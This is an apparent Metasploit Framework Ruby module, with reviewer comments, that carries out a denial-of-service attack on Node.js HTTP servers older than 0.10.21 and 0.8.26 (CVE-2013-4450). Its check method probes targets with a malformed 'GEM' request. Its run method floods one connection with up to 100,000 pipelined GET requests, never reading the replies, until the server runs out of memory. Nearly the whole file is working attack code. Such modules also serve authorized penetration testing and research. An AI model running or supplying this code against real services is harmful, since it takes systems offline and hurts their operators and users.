GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/nodejs_pipelining.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary DoS module for CVE-2013-4450 (see 'References' below).
# Per the 'Description', Node.js versions released before 0.10.21 and 0.8.26
# are affected; the module only ever opens a single TCP connection and writes
# HTTP requests to it, it never reads the server's responses in #run.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the two datastore options this module reads:
  # RPORT (default 80, also used by #host) and RLIMIT, the number of requests
  # #run writes to the connection (default 100000).
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Node.js HTTP Pipelining Denial of Service',
        'Description' => %q{
          This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
          released before 0.10.21 and 0.8.26. The attack sends many pipelined
          HTTP requests on a single connection, which causes unbounded memory
          allocation when the client does not read the responses.
        },
        'Author' => [
          'Marek Majkowski', # Vulnerability discovery
          'titanous', # Metasploit module
          'joev' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-4450' ],
          [ 'OSVDB', '98724' ],
          [ 'BID', '63229' ],
          [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]
        ],
        'DisclosureDate' => '2013-10-18',
        'Notes' => {
          # The module is expected to take the service down; nothing is
          # recorded under SideEffects or Reliability.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
      ]
    )
  end

  # Probes whether the target still accepts a malformed request method.
  #
  # Writes one request whose method is 'GEM' instead of 'GET' and reads a
  # single chunk of the reply. A reply containing 'HTTP' is reported as
  # Appears, an EOFError (no response, per the comment below) as Unknown, and
  # anything else as Safe. The socket is closed in the ensure clause on every
  # path.
  #
  # NOTE(review): the regex accepts any HTTP reply, so an intermediary that
  # answers the unknown method with an HTTP error status would presumably also
  # yield Appears — confirm against the deployment being assessed.
  # NOTE(review): if get_once returns nil (no data but no EOF), `nil =~ /HTTP/`
  # is nil and status stays at Safe rather than Unknown — verify that this is
  # the intended outcome.
  #
  # @return [Msf::Exploit::CheckCode] Appears, Safe or Unknown
  def check
    # http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
    # check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
    status = Exploit::CheckCode::Safe
    connect
    sock.put(http_request('GEM'))
    begin
      response = sock.get_once
      status = Exploit::CheckCode::Appears if response =~ /HTTP/
    rescue EOFError
      # checking against >= 0.10.17 raises EOFError because there is no
      # response to GEM requests
      vprint_error('Failed to determine the vulnerable state due to an EOFError (no response)')
      return Msf::Exploit::CheckCode::Unknown
    ensure
      disconnect
    end
    status
  end

  # Builds the value of the Host header: RHOST, with ':RPORT' appended only
  # when RPORT is not 80. The local variable deliberately shadows the method
  # name; the assignments below touch the local, not the method.
  #
  # @return [String] host or host:port
  def host
    host = datastore['RHOST']
    host += ':' + datastore['RPORT'].to_s if datastore['RPORT'] != 80
    host
  end

  # Minimal HTTP/1.1 request for '/' carrying only a Host header, with CRLF
  # line endings and the blank line that ends the header block.
  #
  # @param method [String] request method; 'GET' by default, #check passes 'GEM'
  # @return [String] the raw request bytes
  def http_request(method = 'GET')
    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
  end

  # Builds one GET request and writes it RLIMIT times over a single connection
  # without ever reading a response — the condition the 'Description'
  # attributes the memory growth to. Failure to connect is reported as a
  # status message; a reset, broken pipe or timeout while writing is reported
  # as the service having stopped responding. The socket is closed in the
  # ensure clause either way.
  def run
    payload = http_request
    begin
      print_status('Stressing the target memory...')
      connect
      # RLIMIT bounds the total number of requests written to the socket.
      datastore['RLIMIT'].times { sock.put(payload) }
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{host}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      # A write failing part-way through the loop is taken as the target
      # having gone down; the module has no other success signal.
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
    ensure
      disconnect
    end
  end
end